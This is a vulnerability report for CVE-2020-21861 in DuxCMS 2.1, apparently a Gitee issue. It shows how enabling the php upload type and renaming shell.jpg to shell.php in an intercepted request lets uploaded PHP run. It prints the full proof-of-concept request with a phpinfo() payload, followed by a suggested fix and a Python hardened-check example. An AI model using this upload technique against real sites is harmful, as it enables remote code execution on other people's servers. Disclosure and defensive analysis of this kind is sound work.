CVE-2020-21861: Insecure configuration causes getshell · Issue #I182Y4 · 王爷/DuxCMS2.1支持php7.0以上版本 - Gitee.com
File upload vulnerability in DuxCMS 2.1 allows attackers to execute arbitrary php code via duxcms/AdminUpload/upload.
File type upload configuration
In the admin panel's file-type upload configuration, add the php file type to the list of allowed upload types.
Upload file features
Then find a file upload feature (here the one reached from the article editor, article/AdminContent/add). The file to upload is named shell.jpg and contains the PHP shown in the request below.
Capture the upload request with an intercepting proxy and change the file suffix in the filename from jpg to php. The modified request looks like this:
POST /DuxCMS/admin.php?r=duxcms/AdminUpload/upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 853
Connection: close
Cookie: 042_sessid_ab46d60bfa95=2020-13-9np1-77uqd8wxh-a95a9743c; phpwcmsBELang=en; loader=loaded; _utcpl=17ad82836af704761d37d9a49a32770es1; __atuvc=3%7C2; PHPSESSID=u7oug0qsfdrqa6r1l5v2kr3noh
-----------------------------191691572411478
Content-Disposition: form-data; name="class_id"
0
-----------------------------191691572411478
Content-Disposition: form-data; name="id"
WU_FILE_0
-----------------------------191691572411478
Content-Disposition: form-data; name="name"
shell.jpg
-----------------------------191691572411478
Content-Disposition: form-data; name="type"
image/jpeg
-----------------------------191691572411478
Content-Disposition: form-data; name="lastModifiedDate"
2020/1/8 下午4:16:35
-----------------------------191691572411478
Content-Disposition: form-data; name="size"
35
-----------------------------191691572411478
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg
<?php
phpinfo();
?>
-----------------------------191691572411478--
Access file
The server's response to the upload returns the address of the stored file. Requesting that address shows that the file was saved with the .php extension and executed: the phpinfo() page is displayed.
Solution
Remove this configuration feature, so that php cannot be added to the allowed upload types from the admin panel. The allowed extensions should be enforced on the server side rather than taken from a configurable list that an administrator session can extend to executable types.
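As an added illustration of both the captured request above and the suggested fix (this is example code written for this page, not DuxCMS code), the script below parses the multipart body from the packet, shows that a check which only consults the admin-configured extension list accepts shell.php once php is in that list, and contrasts it with a hardened check that strips server-executable extensions from the configured list, inspects every extension component, and verifies the image magic bytes. The deny list, the magic-byte table and the reconstructed body (field values taken from the packet; the lastModifiedDate field is omitted) are assumptions of this example.

```python
"""Added example, not DuxCMS code: parse the captured upload body and compare a
naive extension check with a hardened one. Deny list and magic table assumed."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# The boundary from the captured Content-Type header (27 dashes + digits).
BOUNDARY = "-" * 27 + "191691572411478"

# Reconstructed multipart body from the captured request (CRLF line endings,
# lastModifiedDate field omitted). Constructed for this example.
CAPTURED_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="class_id"\r\n\r\n0\r\n'
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="id"\r\n\r\nWU_FILE_0\r\n'
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="name"\r\n\r\nshell.jpg\r\n'
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="type"\r\n\r\nimage/jpeg\r\n'
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="size"\r\n\r\n35\r\n'
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
    "<?php\r\nphpinfo();\r\n?>\r\n"
    "--" + BOUNDARY + "--\r\n"
).encode()


@dataclass
class Part:
    name: str
    filename: Optional[str]
    content_type: Optional[str]
    body: bytes


def parse_multipart(body: bytes, boundary: str) -> List[Part]:
    """Minimal multipart/form-data parser (assumes a well-formed body)."""
    delimiter = b"--" + boundary.encode()
    parts: List[Part] = []
    for chunk in body.split(delimiter)[1:]:      # preamble before first delimiter is ignored
        if chunk.startswith(b"--"):              # closing delimiter
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?:^|;)\s*name="([^"]*)"', disp)
        filename = re.search(r'filename="([^"]*)"', disp)
        parts.append(Part(
            name=name.group(1) if name else "",
            filename=filename.group(1) if filename else None,
            content_type=headers.get("content-type"),
            body=data[:-2] if data.endswith(b"\r\n") else data,  # CRLF before next delimiter
        ))
    return parts


# Assumed deny list: extensions a typical PHP handler executes regardless of config.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "phps"}
# Assumed magic-byte prefixes for the image types an upload form usually accepts.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def extension(filename: str) -> str:
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def naive_check(part: Part, configured_types: List[str]) -> bool:
    """The behaviour the issue describes: any extension in the admin list is accepted."""
    return extension(part.filename or "") in {t.lower().lstrip(".") for t in configured_types}


def hardened_check(part: Part, configured_types: List[str]) -> Tuple[bool, str]:
    """Server-side check that cannot be widened to executable types by configuration.
    The client-supplied 'name', 'type' and part Content-Type are deliberately ignored."""
    filename = part.filename or ""
    allowed = {t.lower().lstrip(".") for t in configured_types} - EXECUTABLE_EXTENSIONS
    pieces = [p.lower() for p in filename.split(".")[1:]]  # every component, so shell.php.jpg is caught
    if not pieces:
        return False, "no extension"
    if any(p in EXECUTABLE_EXTENSIONS for p in pieces):
        return False, "executable extension"
    ext = pieces[-1]
    if ext not in allowed:
        return False, "extension %r not allowed" % ext
    magic = MAGIC.get(ext)
    if magic is not None and not part.body.startswith(magic):
        return False, "content does not match extension"
    return True, "ok"


if __name__ == "__main__":
    upload = parse_multipart(CAPTURED_BODY, BOUNDARY)[-1]
    print("naive:", naive_check(upload, ["jpg", "png", "php"]))
    print("hardened:", hardened_check(upload, ["jpg", "png", "php"]))
```

Note that the request carries three client-controlled claims about the file (the name field shell.jpg, the type field image/jpeg, and the part's Content-Type image/jpeg) that all disagree with the filename shell.php actually used for storage; the hardened check relies on none of them, and a real fix would additionally generate the stored filename on the server rather than reuse the client's.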